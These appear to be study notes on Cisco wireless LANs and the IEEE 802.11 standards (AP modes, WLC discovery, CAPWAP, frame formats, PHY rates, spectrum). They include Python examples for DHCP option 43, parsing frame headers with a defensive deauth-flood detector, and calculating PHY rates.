- Ad-hoc Wi-Fi
- Infrastructure Wi-Fi
- IEEE 802.11
- RF control
- Power
- QoS
- Roaming
- Security
- Design
- Hyperlocation
Ad-hoc Wi-Fi
- P2P, half-duplex
- does not require infrastructure
- basic service set (BSS), independent BSS (IBSS)
- 802.15 – wireless PAN: Bluetooth, ZigBee
Infrastructure Wi-Fi
- access points (APs) announce service set ID (SSID)
- basic service area (BSA), distribution system (DS)
- extended service set (ESS): single SSID on different APs using different channels
Lightweight AP
- real-time functions: RF Tx/Rx, MAC mgmt, encryption
- modes
- local:
- default
- data + monitor
- monitor:
- does not serve clients; scans all channels and collects statistics (rogue detection, location, wIPS)
- sniffer: captures frames on one channel and forwards them to a packet analyser (e.g., Wireshark)
- rogue detector:
- wired only (radios off); listens on the trunk for MAC addresses that other APs reported as rogue over RF
- rogue client/AP MAC also seen on the wire ≡ rogue is plugged into the corporate network (highest severity)
- bridge
- point-to-point / point-to-multipoint bridge, AP mesh
- SE-Connect
- spectrum analysis only: CleanAir data exported to Spectrum Expert / Chanalyzer
- office extend AP (OEAP)
- home office: corporate SSIDs tunnelled to HQ over CAPWAP with DTLS data encryption + personal/guest WLAN straight to Internet
- hybrid remote edge AP (H-REAP), now FlexConnect
- AP can authenticate clients and switch traffic locally when the WLC is unreachable
FlexConnect AP
- modes
- connected: connection with WLC available
- central switching: client traffic forwarded through the CAPWAP tunnel to the WLC
- local switching: AP bridges client traffic into a local VLAN; the client's default gateway must be reachable in the local DS
- standalone: connection with WLC lost (WAN failure)
- AP keeps serving locally switched WLANs (local authC if configured), centrally switched WLANs go down
- preserves connectivity to local resources during WLC/WAN failure
- switching mode is configured per WLAN, with the WLAN-to-VLAN mapping per AP or FlexConnect group
WLC
- single point of management for APs
- bridge between IEEE 802.11 and Ethernet
- AP selection: signal strength
- AP power adjustment: compensate for failed AP
- authC + authZ policies
- QoS
- Roaming
- Power mgmt
- RF mgmt
WLC discovery
- AP bcasts CAPWAP Discovery in LAN (IPv4 subnet broadcast; IPv6 multicast)
- AP sends mcast CAPWAP Discovery to ff01::18c (all CAPWAP contro<br>llers)
- locally stored WLC addresses (primary, secondary, tertiary) learned from a previous join
- DHCP
- option 43: list of WLC IPv4 addresses (Cisco vendor sub-option 0xf1)
- option 52: list of WLC IPv6 addresses
- DNS:
- by name CISCO-CAPWAP-CONTROLLER.localdomain
- .localdomain – domain name received from DHCP
- nothing found → AP reboots and restarts from step 1
; relay the subnet-broadcast Discovery (UDP 5246) to a WLC on another subnet
(config)# ip forward-protocol udp 5246
(config-if)# ip helper-address <WLC_MGMT_IP>
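The DHCP option 43 path above is where most AP-join problems start, because the option is a raw vendor-specific blob rather than a list of addresses. The following is an added example (not code from the original notes) that builds, validates and decodes the Cisco option 43 payload and emits the matching IOS DHCP-pool stanza. Pool name, network and WLC addresses are made-up sample values; the sub-option layout (type 0xf1, length = 4 bytes per WLC, then the IPv4 addresses) is the one Cisco documents.

```python
import ipaddress

# Cisco vendor-specific sub-option carrying WLC IPv4 addresses inside DHCP option 43:
# one byte type (0xf1 = 241), one byte length (4 * number of addresses), then the addresses.
CISCO_WLC_SUBOPTION = 0xF1


def build_option43(wlc_ips):
    """Return the raw option-43 payload bytes for the given WLC IPv4 addresses."""
    if not wlc_ips:
        raise ValueError("at least one WLC address is required")
    payload = b"".join(ipaddress.IPv4Address(ip).packed for ip in wlc_ips)
    if len(payload) > 255:
        raise ValueError("sub-option length must fit in one byte")
    return bytes([CISCO_WLC_SUBOPTION, len(payload)]) + payload


def option43_hex(wlc_ips):
    """Hex string as most DHCP servers expect it (no separators)."""
    return build_option43(wlc_ips).hex()


def ios_option43(wlc_ips):
    """Argument for IOS 'option 43 hex': hex digits in dotted groups of four."""
    h = option43_hex(wlc_ips)
    return ".".join(h[i:i + 4] for i in range(0, len(h), 4))


def parse_option43(raw):
    """Decode a Cisco option-43 payload back into WLC addresses, checking the framing."""
    if len(raw) < 2 or raw[0] != CISCO_WLC_SUBOPTION:
        raise ValueError("not a Cisco WLC sub-option")
    length = raw[1]
    if length % 4 or len(raw) != 2 + length:
        raise ValueError("malformed sub-option length")
    body = raw[2:]
    return [str(ipaddress.IPv4Address(body[i:i + 4])) for i in range(0, length, 4)]


def ios_pool_config(pool_name, network, mask, gateway, wlc_ips):
    """Emit the IOS DHCP-pool stanza for the AP management subnet (sample values)."""
    return "\n".join([
        f"ip dhcp pool {pool_name}",
        f" network {network} {mask}",
        f" default-router {gateway}",
        f" option 43 hex {ios_option43(wlc_ips)}",
    ])


if __name__ == "__main__":
    # Constructed example: two WLCs, primary first
    print(ios_pool_config("AP-MGMT", "10.1.1.0", "255.255.255.0", "10.1.1.1",
                          ["10.10.10.5", "10.10.20.5"]))
```

`parse_option43` is the check to run against what the DHCP server actually hands out (e.g., from a packet capture of the AP's DHCP Offer): a wrong length byte or an odd number of bytes is the usual reason an AP keeps cycling through DHCP and DNS discovery and then reboots.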
WLC selection
- process
- primed WLC: primary → secondary → tertiary (configured on the AP)
- master WLC: configured as master (new APs join it)
- least-loaded: lowest ratio of joined APs to AP capacity (20/100 is better than 20/25)
- WLC may reject AP onboarding
- AP is assigned priority
- 4 levels: low (default), medium, high, critical
- when full, WLC drops APs with lower priority to onboard an AP with higher priority
- keepalive
- 30s default
- if keepalive not responded – send 4 keepalives with interval of 3s
- WLC verifies AP firmware and updates it if necessary
- firmware update requires reboot
- firmware can be uploaded in advance without reload
Mobility Express
- AireOS
- IOS XE – embedded wireless controller (EWC), Catalyst 9100
- WLC functions on AP: separate firmware image
- starting from 802.11ac wave 2 APs
Control and provisioning of wireless AP (CAPWAP)
- RFC 5415; tunnels between AP and WLC
- channels:
- data:
- UDP 5247
- client 802.11 frames encapsulated to the WLC
- no encryption by default, can be protected with DTLS
- control
- UDP 5246
- authentication + encryption: datagram TLS (DTLS) with X.509 certificates (AP manufacturer-installed certificate, WLC certificate)
- messages:
- CAPWAP discovery request: AP searches for WLC
- CAPWAP discovery response
- join request/response, configuration status, change state event, echo (keepalive)
IEEE 802.11
- CSMA/CA: carrier sense + collision avoidance; optional RTS/CTS; every unicast frame is acknowledged
- network allocation vector (NAV): virtual carrier sense, timer set from the Duration field; other stations defer until it expires (frame + SIFS + ACK)
- distributed coordination function (DCF)
- random backoff after the medium has been idle for DIFS, before sending data (or RTS)
- backoff timer: random slot count from the contention window (CW); CW doubles after each collision/missing ACK (binary exponential backoff) up to CWmax
- interframe space (IFS)
- short IFS (SIFS): before ACK, CTS, next fragment (highest priority)
- reduced IFS (RIFS): between data frames in a burst (802.11n)
- extended IFS (EIFS): used instead of DIFS after a frame was received with bad FCS
- DCF IFS (DIFS): before normal data frames, SIFS + 2×slot_time
- medium idle for DIFS → random backoff while listening → send if still clear
Frame format
 0                   1                   2                   3
 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|         Frame control         |          Duration/ID          |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Address 1                           |
+                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                               |                               |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               +
|                           Address 2                           |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Address 3                           |
+                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                               |       Sequence control        |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                           Address 4                           |
+                               +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                               |                               \
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+                               /
\                     Data (0-2304 bytes)                       \
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
|                              FCS                              |
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
Address 4 is present only when To DS = From DS = 1; QoS data frames add a 2-byte QoS Control field (UP/TID) and HT frames a 4-byte HT Control field after the addresses. Multi-byte fields are little-endian.
Duration/ID: µs, time allocated for the exchange: frame + SIFS + ACK (sets the NAV of listening stations); in PS-Poll the field carries the AID instead
Sequence control: 12-bit sequence number + 4-bit fragment number, used for duplicate detection and reassembly
Frame control
   1       2       3       4       5       6       7       8
+-------+-------+-------+-------+-------+-------+-------+-------+
| Proto Version |     Type      |            Subtype            |
+-------+-------+-------+-------+-------+-------+-------+-------+
| To DS |From DS|More fr| Retry |PWR MGT|More dt|  WEP  | Order |
+-------+-------+-------+-------+-------+-------+-------+-------+
As bytes on the wire: byte 0 = subtype<<4 | type<<2 | version (beacon 0x80, deauthentication 0xC0, ACK 0xD4); byte 1 = flags with To DS in bit 0
To DS = From DS = 0: IBSS frames, management and control frames
To DS = From DS = 1: wireless bridge / mesh (WDS), four address fields
More fr: more fragments of this MSDU follow
Retry: retransmission of an earlier frame (receiver uses sequence control to drop duplicates)
PWR MGT:
- 0 ≡ station stays awake after this frame
- 1 ≡ station goes to sleep after this frame; AP must buffer
More dt: more data, power save mode, 1 ≡ AP has more frames buffered for this station
WEP (now "Protected Frame"): 1 ≡ frame body is encrypted (WEP, TKIP or CCMP); management frames have it set only with 802.11w
Order: 1 ≡ strictly ordered service; in HT frames signals that the HT Control field is present
Type:
- 00: management
- advertise: BSS, capabilities
- client management: join, leave
- subtypes
- 0000: association request
- association ID (AID)
- 0001: association response
- association ID (AID)
- 0010: reassociation request
- roaming between BSS
- 0011: reassociation response
- 0100: probe request
- active scanning: request beacon
- 0101: probe response
- 0111: reserved
- 1000: beacon
- data rates: necessary and allowed
- SSID
- ~ 100 ms interval
- 1010: disassociation
- ends the association, does not reset authenticated status
- 1011: authentication
- Open System or Shared Key (WEP) exchange
- not an actual authC with WPA/WPA2: the real authC happens after association (802.1X or PSK, 4-way handshake)
- 1100: deauthentication
- ends authentication and association
- unprotected in plain 802.11 ⇒ trivially spoofed (deauth flood, forced reconnect to capture a handshake) unless 802.11w/PMF is in use
- 1110: action
- extended management (block ack setup, radio measurement, spectrum and power management)
- 01: control
- facilitate data transmission
- no payload, header only
- subtypes
- 0100: beamforming report poll
- 0101: VHT/HE NDP Announcement
- 0110: control frame extension
- 0111: control wrapper
- 1000: block ACK request
- 1001: block ACK
- 1010: PS-Poll
- station in Power Save mode requests frames from AP
- 1011: RTS
- 1100: CTS
- 1101: ACK
- acknowledge receiving unicast frame (data, management)
- 1110: CF-End
- 1111: CF-End + CF-ACK
- 10: data
- subtypes
- 0000: data
- 0001: data + CF-ACK
- 0010: data + CF-Poll
- 0011: data + CF-ACK + CF-Poll
- 0100: NULL (no data)
- 0101: CF-ACK (no data)
- 0110: CF-Poll (no data)
- 0111: CF-ACK + CF-Poll (no data)
- 1000: QoS data
- 1001: QoS data + CF-ACK
- 1010: QoS data + CF-Poll
- 1011: QoS data + CF-ACK + CF-Poll
- 1100: QoS NULL (no data)
- 1101: reserved
- 1110: QoS CF-Poll (no data)
- 1111: QoS CF-ACK + CF-Poll (no data)
Addressing
- RA – receiver address (the station that must ACK)
- TA – transmitter address
- DA/SA – end-to-end destination/source, the 802.3 addresses
- BSSID – MAC of the AP radio for this BSS (one per SSID)
- which field carries what depends on To DS / From DS:

| Case                  | To DS | From DS | Address 1  | Address 2  | Address 3 | Address 4 |
|-----------------------|-------|---------|------------|------------|-----------|-----------|
| IBSS, mgmt, control   | 0     | 0       | RA = DA    | TA = SA    | BSSID     | –         |
| DS → station          | 0     | 1       | RA = DA    | TA = BSSID | SA        | –         |
| station → DS          | 1     | 0       | RA = BSSID | TA = SA    | DA        | –         |
| wireless bridge, mesh | 1     | 1       | RA         | TA         | DA        | SA        |
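The header layout, frame control bits and To DS / From DS address table above are exactly what a monitor-mode capture hands you, so the following added example (my code, not part of the original notes) parses a raw 802.11 MAC header into type, subtype, flags and the RA/TA/DA/SA/BSSID roles, and then runs a small deauthentication-flood detector over a constructed capture. It also records the Protected Frame bit, which is how you tell a spoofable deauth from one covered by 802.11w (see the Security section). All frames, MAC addresses and timestamps are constructed for the example; FCS values are left as zeros, and the QoS/HT Control fields are not decoded.

```python
import struct
from collections import defaultdict, deque

TYPE_NAMES = {0: "management", 1: "control", 2: "data"}
MGMT_SUBTYPES = {0: "assoc-req", 1: "assoc-resp", 2: "reassoc-req", 3: "reassoc-resp",
                 4: "probe-req", 5: "probe-resp", 8: "beacon", 10: "disassoc",
                 11: "auth", 12: "deauth", 13: "action"}
CTRL_SUBTYPES = {8: "block-ack-req", 9: "block-ack", 10: "ps-poll", 11: "rts",
                 12: "cts", 13: "ack", 14: "cf-end", 15: "cf-end+cf-ack"}
CTRL_WITH_TA = {8, 9, 10, 11, 14, 15}        # control subtypes that also carry Address 2 (TA)
# Frame-control flag byte, bit 0 first (To DS ... Order)
FLAG_NAMES = ["to_ds", "from_ds", "more_frag", "retry", "pwr_mgt", "more_data",
              "protected", "order"]


def mac(b):
    return ":".join(f"{x:02x}" for x in b)


def parse_header(frame):
    """Decode the 802.11 MAC header of a raw frame (FCS included) into a dict."""
    fc0, fc1, duration = struct.unpack_from("<BBH", frame, 0)
    hdr = {"version": fc0 & 0x3, "type": (fc0 >> 2) & 0x3, "subtype": fc0 >> 4,
           "flags": {n: bool(fc1 & (1 << i)) for i, n in enumerate(FLAG_NAMES)},
           "duration": duration}
    hdr["type_name"] = TYPE_NAMES.get(hdr["type"], "reserved")
    if hdr["type"] == 1:                      # control: RA (+ TA), no Address 3 / seq ctrl
        hdr["subtype_name"] = CTRL_SUBTYPES.get(hdr["subtype"], "reserved")
        hdr["ra"] = mac(frame[4:10])
        if hdr["subtype"] in CTRL_WITH_TA:
            hdr["ta"] = mac(frame[10:16])
        return hdr
    hdr["subtype_name"] = (MGMT_SUBTYPES.get(hdr["subtype"], "reserved")
                           if hdr["type"] == 0 else f"data/{hdr['subtype']:04b}")
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    seq = struct.unpack_from("<H", frame, 22)[0]
    hdr["fragment"], hdr["sequence"] = seq & 0xF, seq >> 4
    to_ds, from_ds = hdr["flags"]["to_ds"], hdr["flags"]["from_ds"]
    body_off = 24
    if not to_ds and not from_ds:             # IBSS, management, control
        hdr.update(ra=mac(a1), da=mac(a1), ta=mac(a2), sa=mac(a2), bssid=mac(a3))
    elif from_ds and not to_ds:               # AP → station
        hdr.update(ra=mac(a1), da=mac(a1), ta=mac(a2), bssid=mac(a2), sa=mac(a3))
    elif to_ds and not from_ds:               # station → AP
        hdr.update(ra=mac(a1), bssid=mac(a1), ta=mac(a2), sa=mac(a2), da=mac(a3))
    else:                                     # WDS / mesh: four addresses
        hdr.update(ra=mac(a1), ta=mac(a2), da=mac(a3), sa=mac(frame[24:30]))
        body_off = 30
    hdr["body"] = frame[body_off:-4]          # QoS/HT Control not handled; 4-byte FCS stripped
    return hdr


def build_frame(ftype, subtype, flags, a1, a2, a3, seq, body=b""):
    """Build a constructed test frame (3-address header; FCS left as zeros, not a valid CRC)."""
    fc1 = sum(1 << FLAG_NAMES.index(f) for f in flags)
    hdr = struct.pack("<BBH", (ftype << 2) | (subtype << 4), fc1, 314)
    return hdr + a1 + a2 + a3 + struct.pack("<H", seq << 4) + body + b"\0\0\0\0"


def deauth_flood(capture, window_s=1.0, threshold=10):
    """Flag BSSIDs sending >= threshold deauth/disassoc frames within any sliding window.
    Returns {bssid: (peak_count, protected_count)}; protected_count is how many of those
    frames had the Protected bit set (802.11w), i.e. were not trivially spoofable."""
    recent, alerts = defaultdict(deque), {}
    for ts, raw in sorted(capture, key=lambda x: x[0]):
        h = parse_header(raw)
        if h["type"] != 0 or h["subtype"] not in (10, 12):
            continue
        q = recent[h["bssid"]]
        q.append((ts, h["flags"]["protected"]))
        while ts - q[0][0] > window_s:
            q.popleft()
        if len(q) >= threshold and len(q) > alerts.get(h["bssid"], (0, 0))[0]:
            alerts[h["bssid"]] = (len(q), sum(p for _, p in q))
    return alerts


# Constructed sample capture: one beacon, then a burst of spoofed broadcast deauths
AP = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("aabbccddee01")
BCAST = b"\xff" * 6
SAMPLE_CAPTURE = [(0.10, build_frame(0, 8, [], BCAST, AP, AP, 1, b"\0" * 12))]
SAMPLE_CAPTURE += [(0.50 + 0.04 * i,
                    build_frame(0, 12, [], BCAST, AP, AP, 100 + i, struct.pack("<H", 7)))
                   for i in range(12)]        # reason 7: class 3 frame from non-associated STA
# A CTS is header-only: frame control, duration, RA, FCS
SAMPLE_CTS = struct.pack("<BBH", (1 << 2) | (12 << 4), 0, 44) + CLIENT + b"\0\0\0\0"
```

The detector keys on the BSSID field, which is why the address table matters: for a deauth from the AP side the BSSID sits in Address 2 and 3, for a client-originated one in Address 1. A burst of unprotected deauths whose Address 2 is a BSSID you own is either your own WLC's containment or an attacker; the `protected_count` of zero on a WLAN that advertises PMF is the quickest way to tell them apart.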
802.11-1997
- FHSS: 1 Mbps, 2 Mbps
- DSSS: DBPSK (1 Mbps), DQPSK (2 Mbps)
- 2.4 GHz
802.11b
- 2.4 GHz
- DSSS: DQPSK + CCK (5.5 Mbps, 11 Mbps)
802.11a
- 5 GHz
- OFDM: BPSK, QPSK, QAM (up to 54 Mbps)
802.11g
- 2.4 GHz
- OFDM: BPSK, QPSK, QAM (up to 54 Mbps)
- backwards-compatible with 802.11b
- protection mechanism: 802.11b stations cannot decode OFDM ⇒ an 802.11g station reserves the medium with DSSS-modulated RTS/CTS or CTS-to-self before an OFDM transmission
802.11n
- 2.4 GHz, 5 GHz
- BPSK, QPSK, QAM (up to 600 Mbps)
- backwards-compatible with 802.11g and 802.11a
- high throughput (HT)
- MIMO
- several Tx and Rx
- 2×3 ≡ 2 Tx + 3 Rx
- channel aggregation (40 MHz)
- 20 MHz: 52 data + 4 pilot subcarriers (802.11a/g: 48 data): former guard subcarriers carry data
- 40 MHz: two adjacent 20 MHz channels, 108 data + 6 pilot = 114 subcarriers, 14 guard/null
- spatial multiplexing
- distribute data stream across antennae: different radio chains
- 3×3:2 ≡ 3 Tx + 3 Rx + 2 spatial streams
- MAC efficiency
- A-MSDU: several payloads (MSDU) after a single 802.11 header; top of MAC layer, software; one FCS ⇒ one bit error drops all of them
- A-MPDU: several MPDUs (each with its own header and FCS) in one PHY frame, separated by A-MPDU delimiters; bottom of MAC layer, hardware
- block ack: acknowledge all MPDUs of an A-MPDU with a single frame instead of an ACK per frame
- short guard interval: 400 ns (was 800 ns), still enough against intersymbol interference (ISI) in most indoor cells
- TxBF
- transmit beamforming
- adjusts phase per antenna to form a beam towards the receiver
- MRC
- maximal-ratio combining
- combines several copies of the signal received through different radio chains to reconstruct the original: Rx sensitivity improvement
802.11ac
- Wi-Fi 5
- 5GHz
- BPSK, QPSK, QAM
- up to 6.93 Gbps
- wave 1: up to 1.3 Gbps
- wave 2: up to 2.6 Gbps
- backwards-compatible with 802.11n
- channel aggregation
- channels of 80 MHz (wave 1) and 160 MHz / 80+80 MHz (wave 2)
- 20 MHz channel uses 52 data subcarriers, 4 pilot subcarriers (80 MHz: 234 data + 8 pilot)
- dynamic bandwidth: a wide channel overlaps the narrower channels of neighbouring BSSs
- claim channel using RTS/CTS on every 20 MHz sub-channel; CTS comes back only on the part that is clear
- 80+80 MHz: the aggregated channels do not have to be adjacent
- dense modulation
- QAM 256
- optional in wave 1
- MAC efficiency
- MAC service data unit (MSDU) ≡ payload, ≤ 2304 bytes
- PLCP service data unit (PSDU) ≡ 802.11 header + payload + FCS, as handed to the PHY
- all frames are sent as A-MPDU by default (even a single MPDU)
- PHY signals duration (number of symbols), not length: max PPDU air time ≈ 5.5 ms, max A-MPDU length 1,048,575 bytes
- MPDU length is carried in the A-MPDU delimiter
- two-level aggregation: MSDUs aggregated into an A-MSDU, which is the payload of one MPDU; MPDUs aggregated into an A-MPDU
- explicit TxBF
- NULL data packet (NDP) sounding – the only beamforming method (implicit 802.11n methods dropped)
- beamformee replies to the NDP Announcement + NDP with a compressed feedback matrix
- scalable MIMO
- up to 8 spatial streams
- wave 1: 3 spatial streams
- wave 2: 4 spatial streams
- multi-user MIMO (MU-MIMO)
- downlink
- wave 2
802.11ax
- Wi-Fi 6
- 2.4 GHz, 5 GHz
- up to 9.6 Gbps
- backwards-compatible with 802.11ac
- uplink MU-MIMO
- OFDMA: FDM + TDM (OFDM has only TDM ≡ whole channel for a single user)
- channel split into resource units (RU) of 26 or more subcarriers
- trigger frame (sent at a basic rate) tells clients which RU to use and when
- legacy clients honour the NAV set by the trigger; 11ax clients transmit simultaneously in their RUs, AP answers with a multi-STA block ack
- 1024-QAM
- 8 spatial streams
- longer symbol, relatively smaller guard interval: symbol duration 12.8 µs (was 3.2 µs), GI 0.8/1.6/3.2 µs
- subcarriers are 4× denser (78.125 kHz spacing)
- BSS coloring: each BSS adds a 6-bit colour to the preamble
- distinguish frames of own BSS from overlapping BSS (OBSS) by colour, not only by RSSI
- spatial reuse: raise the CCA threshold for OBSS colours (and/or lower own Tx power) ⇒ transmit over weak OBSS frames on the same channel
- target wake time (TWT)
- multiple BSSID: several BSSIDs in a single beacon in lieu of a beacon per BSSID
RF control
Request to send (RTS) / clear to send (CTS)
- sent at a basic rate (DSSS on 2.4 GHz) so every station can decode them
- RTS/CTS threshold
- in bytes (0-2347); frames shorter than the threshold are sent without RTS/CTS if the medium is clear
- frame longer than the threshold: RTS → CTS → data → ACK; RTS and CTS both carry a Duration that sets the NAV of every station hearing them ≡ reserve the medium (also solves the hidden-node problem)
- CTS-to-self: station sends a CTS addressed to itself ⇒ other stations set their NAV ≡ reserve the medium with one frame (used for 802.11g protection)
- CTS and ACK carry only the receiver address (RA), no transmitter address
- RTS RA = AP MAC in infrastructure mode
Frequency hopping spread spectrum (FHSS)
- deprecated for Wi-Fi
- 79 channels (1 MHz wide)
- Rx and Tx must synchronize on timing and algorithm
- signal periodically hops to other channels: avoid noise from interference
- limitation:
- narrow channels → 2 Mbps max
- does not exclude interference, especially with numerous Tx
Direct sequence spread spectrum (DSSS)
- 14 channels (2.4 GHz), 5 MHz spacing (channel 14 at 2.484 GHz)
- each 22 MHz wide
- non-overlapping channels: 1, 6, 11
- components
- scrambler:
- data sequence gains pseudorandomness: no long sequences of 0 or 1
- coder:
- transforms each data bit (or group of bits) into a symbol of several chips (1 chip ≡ 1 bit on air)
- Barker code: 11-chip sequence with a sharp autocorrelation peak ⇒ Rx can lock on it under noise
- complementary code keying (CCK): 8-chip codes carrying several bits per symbol
- interleaver:
- divides the stream into blocks: an interference peak does not affect other blocks
- modulator
- chipping rate:
- 11 Mchip/s
- sequential chip transmission
- constant for all rates
- rates:
- 1 Mbps
- 11-chip Barker code, 1 data bit per symbol
- differential binary phase shift keying (DBPSK): 180° phase shift
- 2 Mbps
- 11-chip Barker code, 2 data bits per symbol
- differential quadrature phase shift keying (DQPSK): 90° phase steps
- 5.5 Mbps
- CCK: 4 data bits per 8-chip symbol (2 bits select the code, 2 bits the DQPSK phase)
- 11 Mchip/s / 8 chips = 1.375 Msymbol/s × 4 bits = 5.5 Mbps
- 11 Mbps
- CCK: 8 data bits per 8-chip symbol (6 bits select the code, 2 bits the DQPSK phase)
- 1.375 Msymbol/s × 8 bits = 11 Mbps
Orthogonal frequency division multiplexing (OFDM)
- 20 MHz channels
- each has 64 subcarriers
- guard / null
- 12 subcarriers (incl. the DC subcarrier in the middle)
- channel separation
- allow Rx to lock on channel
- pilot
- 4 subcarriers
- evenly spaced
- always transmitted with known content – Rx estimates noise and phase in the channel
- data
- 48 subcarriers
- subcarriers are separated by 312.5 kHz (20 MHz / 64)
- subcarrier spectra overlap, but the tails cancel at the neighbours' centres: intercarrier interference (ICI) = 0
- symbol duration 4 µs (3.2 µs + 0.8 µs guard interval) ⇒ 250 ksymbol/s per subcarrier, 250 kbps with BPSK
- bits are sent in parallel on different subcarriers
- convolutional coder adds redundancy for forward error correction; coding rate k/n ≡ k data bits per n transmitted bits
- 1/2: half of the transmitted bits are redundant
- 3/4: 75% data bits, 25% redundancy
- modulation (802.11a/g, 20 MHz):
- BPSK
- 1/2: 6 Mbps
- 3/4: 9 Mbps
- QPSK
- 1/2: 12 Mbps
- 3/4: 18 Mbps
- 16-QAM
- 1/2: 24 Mbps
- 3/4: 36 Mbps
- 64-QAM
- 2/3: 48 Mbps
- 3/4: 54 Mbps
- 256-QAM (802.11ac, 1 spatial stream, 20 MHz, 52 data subcarriers)
- 3/4: 78 Mbps
- 5/6: 86.7 Mbps
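Every rate in the DSSS and OFDM lists above follows from the same two formulas (chip rate / chips per symbol × bits per symbol, and data subcarriers × bits per subcarrier × coding rate × streams / symbol time). The following is an added example (not code from the original notes) that rebuilds the 802.11a/g rate table from those numbers and extends the same calculation to the 802.11n/ac widths, streams and short guard interval, which is how the 600 Mbps and 6.93 Gbps headline figures in the 802.11n/ac sections come about. The subcarrier counts and symbol times are the standard values quoted in the notes; nothing else is assumed.

```python
from fractions import Fraction

# Data subcarriers per OFDM channel: 802.11a/g 20 MHz = 48;
# 802.11n/ac 20/40/80/160 MHz = 52/108/234/468
DATA_SUBCARRIERS = {("a/g", 20): 48, ("n/ac", 20): 52, ("n/ac", 40): 108,
                    ("n/ac", 80): 234, ("n/ac", 160): 468}
BITS_PER_SUBCARRIER = {"BPSK": 1, "QPSK": 2, "16-QAM": 4, "64-QAM": 6,
                       "256-QAM": 8, "1024-QAM": 10}
OFDM_SYMBOL_US = 3.2            # useful symbol time; the guard interval is added on top
DSSS_CHIP_RATE_MHZ = 11.0       # constant chipping rate for all DSSS/CCK rates


def ofdm_rate_mbps(modulation, coding, width=20, gen="a/g", streams=1, short_gi=False):
    """PHY rate = data subcarriers × bits/subcarrier × coding rate × streams / symbol time.
    Mbit per µs equals Mbps, so no unit conversion is needed."""
    n_sd = DATA_SUBCARRIERS[(gen, width)]
    symbol_us = OFDM_SYMBOL_US + (0.4 if short_gi else 0.8)
    bits_per_symbol = n_sd * BITS_PER_SUBCARRIER[modulation] * Fraction(coding) * streams
    return round(float(bits_per_symbol) / symbol_us, 1)


def dsss_rate_mbps(chips_per_symbol, bits_per_symbol):
    """DSSS/CCK rate = chip rate / chips per symbol × data bits per symbol."""
    return DSSS_CHIP_RATE_MHZ / chips_per_symbol * bits_per_symbol


def rate_table_ag():
    """The 802.11a/g rate set, rebuilt from the numerology above."""
    mcs = [("BPSK", "1/2"), ("BPSK", "3/4"), ("QPSK", "1/2"), ("QPSK", "3/4"),
           ("16-QAM", "1/2"), ("16-QAM", "3/4"), ("64-QAM", "2/3"), ("64-QAM", "3/4")]
    return [(m, c, ofdm_rate_mbps(m, c)) for m, c in mcs]


def rate_table_b():
    """802.11/802.11b: Barker (11 chips) for 1 and 2 Mbps, CCK (8 chips) for 5.5 and 11 Mbps."""
    return [("DBPSK/Barker", dsss_rate_mbps(11, 1)), ("DQPSK/Barker", dsss_rate_mbps(11, 2)),
            ("DQPSK/CCK", dsss_rate_mbps(8, 4)), ("DQPSK/CCK", dsss_rate_mbps(8, 8))]


def max_rate_11n():
    """Upper bound of 802.11n: 40 MHz, 64-QAM 5/6, 4 spatial streams, short GI."""
    return ofdm_rate_mbps("64-QAM", "5/6", 40, "n/ac", 4, short_gi=True)


def max_rate_11ac():
    """Upper bound of 802.11ac: 160 MHz, 256-QAM 5/6, 8 spatial streams, short GI."""
    return ofdm_rate_mbps("256-QAM", "5/6", 160, "n/ac", 8, short_gi=True)
```

The same function shows why a "54 Mbps" or "1.3 Gbps" figure is a PHY rate, not throughput: it contains no preamble, IFS, ACK or contention time, which is what the MAC-efficiency items (A-MPDU, block ack) in the 802.11n/ac sections are trying to claw back.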
Spectrum
Industry, scientific, medical (ISM)
- allocated by ITU-R
- unlicensed frequencies
- 2.4-2.5 GHz (802.11 uses 2.400-2.4835 GHz)
- max Tx: 30 dBm
- max EIRP: 36 dBm (20 dBm in Europe)
- 5.725-5.875 GHz (overlaps U-NII-3)
- for comparison, the 5 GHz U-NII bands below offer about 23 non-overlapping 20 MHz channels vs 3 at 2.4 GHz
Unlicensed national information infrastructure (U-NII)
- allocated by Federal Communications Commission (FCC)
- U-NII-1:
- 5.15-5.25 GHz: channels 32, 36, 40, 44, 48
- indoor
- max Tx
- 17 dBm (50 mW) in US
- 23 dBm in EU
- max EIRP: 23 dBm
- U-NII-2:
- 5.25-5.35 GHz: channels 52, 56, 60, 64, 68
- indoor/outdoor in US, indoor in EU
- max Tx
- 24 dBm (250 mW) in US
- 23 dBm in EU
- max EIRP: 30 dBm
- U-NII-2 Extended:
- 5.470-5.725 GHz: channels 96, … , 140
- indoor/outdoor
- max Tx
- 24 dBm (250 mW) in US
- 30 dBm in EU
- max EIRP: 30 dBm
- U-NII-3:
- 5.725-5.825 GHz: channels 149, … , 165
- indoor/outdoor in US, licensed in EU
- max Tx: 30 dBm (1 W)
- max EIRP: 36 dBm
- channel width: 20 MHz, so channel numbers step by 4 (4 × 5 MHz)
- channel numbering: centre frequency = 5000 MHz + 5 MHz × channel number ⇒ channel 36 = 5.180 GHz (2.4 GHz: 2407 MHz + 5 MHz × channel, channel 14 = 2484 MHz)
Dynamic frequency selection (DFS)
- release frequency, if military/weather radar is detected
Radio resource management (RRM)
- calculates optimal RF parameters for APs in RF group (once per 600s by default)
- RF group
- by default all APs from same WLC are in the same RF group
- different WLCs
- requirements
